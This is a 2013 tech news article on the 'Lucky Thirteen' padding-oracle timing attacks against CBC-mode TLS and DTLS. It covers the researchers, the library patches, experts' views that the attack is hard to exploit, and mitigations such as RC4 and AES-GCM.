Researchers devise new attack techniques against SSL

Almost all libraries used for implementing some of the Internet's most important security protocols are likely to be vulnerable to the new 'Lucky Thirteen' attacks

The developers of many SSL libraries are releasing patches for a vulnerability that could potentially be exploited to recover plaintext information, such as browser authentication cookies, from encrypted communications.

The patching effort follows the discovery of new ways to attack SSL, TLS and DTLS implementations that use cipher-block-chaining (CBC) mode encryption. The new attack methods were developed by researchers Nadhem J. AlFardan and Kenneth G. Paterson at the University of London's Royal Holloway College.

[ Learn how to protect your systems with Roger Grimes' Security Adviser blog and Security Central newsletter, both from InfoWorld. ]

The men published a research paper and a website on Monday with detailed information about their new attacks, which they have dubbed the Lucky Thirteen. They've worked with several TLS library vendors, as well as the TLS Working Group of the IETF (Internet Engineering Task Force), to fix the issue.

The TLS (Transport Layer Security) protocol and its predecessor, the SSL (Secure Sockets Layer) protocol, are a core part of HTTPS (Hypertext Transfer Protocol Secure), the primary method of securing communications on the Web. The DTLS (Datagram Transport Layer Security) protocol is based on TLS and used for encrypting connections between applications that communicate over UDP (User Datagram Protocol).

"OpenSSL, NSS, GnuTLS, yaSSL, PolarSSL, Opera, and BouncyCastle are preparing patches to protect TLS in CBC-mode against our attacks," the researchers said on their website.

The discovery means that end users could theoretically be vulnerable to hackers when they visit HTTPS websites that haven't applied the patches. However, security experts say the vulnerability is very hard to exploit, so there may be little cause for alarm.

"The attacks arise from a flaw in the TLS specification rather than as a bug in specific implementations," they said. "The attacks apply to all TLS and DTLS implementations that are compliant with TLS 1.1 or 1.2, or with DTLS 1.0 or 1.2 [the most recent versions of the two specifications]. They also apply to implementations of SSL 3.0 and TLS 1.0 that incorporate countermeasures to previous padding oracle attacks. Variant attacks may also apply to non-compliant implementations."

What this means is that almost all libraries used for implementing some of the Internet's most important security protocols are likely to be vulnerable to the Lucky Thirteen attacks.

The good news is that executing these attacks successfully in the real world to decrypt data from TLS connections is difficult because they require specific server-side and client-side conditions. For example, the attacker needs to be very close to the targeted server -- on the same local area network (LAN).

Padding oracle attacks have been known for over a decade. They involve an attacker capturing an encrypted record while in transit, altering certain parts of it, submitting it to the server and monitoring how long it takes for the server to fail the decryption attempt. By adapting his modifications and analyzing the time differences between many decryption attempts, the attacker can eventually recover the original plaintext byte by byte.

The TLS designers attempted to block such attacks in version 1.2 of the TLS specification, by reducing the timing variations to a level they thought would be too low to be exploitable. However, the Lucky Thirteen research from AlFardan and Paterson shows that this assumption was incorrect and that successful padding oracle attacks are still possible.

"The new AlFardan and Paterson result shows that it is indeed possible to distinguish the tiny timing differential caused by invalid padding, at least from a relatively close distance -- e.g., over a LAN," Matthew Green, a cryptographer and research professor at Johns Hopkins University in Baltimore, Maryland, said Monday in a blog post. "This is partly due to advances in computing hardware: most new computers now ship with an easily accessible CPU cycle counter. But it's also thanks to some clever statistical techniques that use many samples to smooth out and overcome the jitter and noise of a network connection."

In addition to being in close proximity to the targeted server, a successful Lucky Thirteen attack would also require a very high number -- millions -- of attempts in order to gather enough data to perform relevant statistical analysis of the timing differences and overcome network noise that might interfere with the process.

In order to achieve this, the attacker would need a way to force the victim's browser to make a very large number of HTTPS connections. This can be done by placing a piece of rogue JavaScript code on a website visited by the victim.

The secret plaintext targeted for decryption needs to have a fixed position in the HTTPS stream. This condition is met by authentication (session) cookies -- small strings of random text stored by websites in browsers to remember logged-in users. An authentication cookie can give the attacker access to the user's account on its corresponding website, making it a valuable piece of information worth stealing.

However, the biggest hurdle to be overcome by potential attackers is the fact that TLS kills the session after each failed decryption attempt, so the session needs to be renegotiated with the server. "TLS handshakes aren't fast, and this attack can take tens of thousands (or millions!) of connections per [recovered] byte," Green said. "So in practice the TLS attack would probably take days. In other words: don't panic."

DTLS on the other hand does not kill the session if the server fails to decrypt a record because it was altered, making the Lucky Thirteen attacks borderline practical against this protocol, Green said.

"The attacks can only be carried out by a determined attacker who is located close to the machine being attacked and who can generate sufficient sessions for the attacks," AlFardan and Paterson said. "In this sense, the attacks do not pose a significant danger to ordinary users of TLS in their current form. However, it is a truism that attacks only get better with time, and we cannot anticipate what improvements to our attacks, or entirely new attacks, may yet to be discovered."

Ivan Ristic, director of engineering at security firm Qualys, agrees that the Lucky Thirteen attacks are practical for DTLS, but not practical in their current form for TLS. Nevertheless, the research is significant from an academic standpoint, he said Tuesday via email.

Web server administrators have the option of prioritizing a cipher suite that's not affected by these types of attack in their HTTPS implementations. For many, the only choice is RC4, a stream cipher that dates back to 1987.

"There's a wide dislike of RC4 because of its known flaws (none of which apply or applied to SSL/TLS), but we haven't yet seen a working attack against RC4 as used in TLS," Ristic said. "In that sense, even though RC4 is not ideal, it appears to be stronger than the alternatives currently available in TLS 1.0."

TLS 1.2 supports AES-GCM (AES Galois Counter Mode), a more modern cipher suite that's also not vulnerable to these types of attack. However, the overall adoption of TLS 1.2 is currently low.

According to data from SSL Pulse, a project created by Qualys to monitor the quality of SSL/TLS support across the Web, only 11 percent of the Internet's top 177,000 HTTPS websites have support for TLS 1.2.

"I think this discovery will be yet another reason to speed up TLS 1.2 deployment," Ristic said.

This is not the first time people have suggested prioritizing RC4 in TLS to prevent padding oracle attacks. The same thing happened two years ago when the BEAST (Browser Exploit Against SSL/TLS) attack was announced.

"From the most recent SSL Pulse results (January), we know that 66.7% of the servers are vulnerable to the BEAST attack, which means that they do not prioritize RC4," Ristic said. "Of those, a small number will support TLS 1.2 and may prioritize a non-CBC suite supported only in this version of the protocol. However, because so few browsers support TLS 1.2, I think we can estimate that about 66% of the servers will negotiate CBC."

Copyright © 2013 IDG Communications, Inc.